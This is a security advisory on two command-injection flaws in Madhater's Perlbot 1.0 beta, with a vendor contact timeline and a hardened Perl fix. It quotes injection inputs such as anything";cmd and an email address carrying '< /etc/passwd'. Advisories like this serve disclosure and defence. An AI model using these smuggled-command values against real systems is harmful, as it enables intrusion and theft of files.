| A security vulnerability in Madhater's Perlbot allows remote attackers to cause the product to execute arbitrary code. |
Credit:
The information has been provided by guejez.
Vulnerable systems:
* Perlbot version 1.0 beta
1. Because user input is passed to a shell call without any filtering, the script can be made to execute any command its user account has permission to run.
A more detailed explanation:
The script does not limit the characters sent to the shell from user input. The problem is in this line:
foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)
This allows an attacker to "break out" of the double quotes and issue any command they wish by submitting a word such as anything";cmd. Other abuses include issuing commands with `cmd` or $(cmd), or using \xxx, where xxx is the octal value of any character. Some form of user input filtering must be used.
2. Because user input is not filtered and the script uses an unsafe open() call when it attempts to send email, command execution is possible.
A more detailed explanation:
The script attempts to send an email to the user. It takes the user's supplied email address and passes it to the shell as a command-line argument to the mail program:
open (MAIL,"| $sendmail $recipient") || die $!;
This means an email address such as hacker@scan-associates.net < /etc/passwd could be used to retrieve any file the script has permission to read, and hacker@scan-associates.net ;cmd gives command execution. To prevent this, simply keep the $recipient value out of the shell call.
Fix:
According to the author a fix could be in a new version of the script. The script's homepage was down at the time of this advisory, so here is the suggested fix. Replace the following line:
my $word=$';
With:
my $word=$';
$word =~ s/[^\w]//g;
And replace the following line:
open (MAIL,"| $sendmail $recipient") || die $!;
With:
open (MAIL,"| $sendmail -t") || die $!;
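The following is an added illustration of both fixes together, not code from Perlbot or its author: it keeps the advisory's whitelist filter and -t approach, but also removes the shell from both calls by using list-form open2()/open(), so metacharacters can never be interpreted. The ispell and sendmail paths are taken from the advisory; the address check in send_mail is an extra assumption of this example.

```perl
use strict;
use warnings;
use IPC::Open2;

# Paths taken from the advisory; adjust for the target system.
my $ISPELL   = '/usr/local/bin/ispell';
my $SENDMAIL = '/usr/sbin/sendmail';

# Whitelist filter from the advisory's fix: every non-word character
# (quotes, ';', backticks, '$', '(', ')', backslashes) is dropped.
sub sanitize_word {
    my ($word) = @_;
    $word =~ s/[^\w]//g;
    return $word;
}

# Run "ispell -a" on one word with no shell in between: the list form of
# open2() execs ispell directly, so the input is plain bytes to ispell and
# is never parsed by /bin/sh. The word goes to ispell's stdin, not argv.
sub spellcheck {
    my ($word) = @_;
    $word = sanitize_word($word);
    return () if $word eq '';
    my $pid = open2(my $from_ispell, my $to_ispell, $ISPELL, '-a');
    print {$to_ispell} "$word\n";
    close $to_ispell;
    my @lines = <$from_ispell>;
    close $from_ispell;
    waitpid $pid, 0;
    return @lines;
}

# Accept only a plain user@host address (\z rather than $, so a trailing
# newline cannot slip past), then pass it to sendmail as a To: header via
# -t instead of as a command-line argument. List-form open() avoids the shell.
sub send_mail {
    my ($recipient, $subject, $body) = @_;
    return 0 unless $recipient =~ /\A[\w.+-]+@[\w.-]+\z/;
    $subject =~ tr/\r\n//d;    # no header injection through the subject either
    open(my $mail, '|-', $SENDMAIL, '-t') or die "cannot run sendmail: $!";
    print {$mail} "To: $recipient\nSubject: $subject\n\n$body\n";
    close $mail or die "sendmail exited with status $?";
    return 1;
}

# Constructed inputs modelled on the advisory's payloads.
print sanitize_word('anything";cmd'), "\n";
print send_mail('hacker@scan-associates.net ;cmd', 'test', 'body') ? "sent\n" : "rejected\n";
```

The second call is rejected before sendmail is ever started, because the space and ';' fail the address check; a well-formed address reaches sendmail only inside the message headers.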
Vendor Contact:
07-22-02 - guejez emailed myneid@gothcafe.com and alerted him of this vulnerability.
07-22-02 - guejez received email confirming vulnerabilities and stating fixes could be in new version.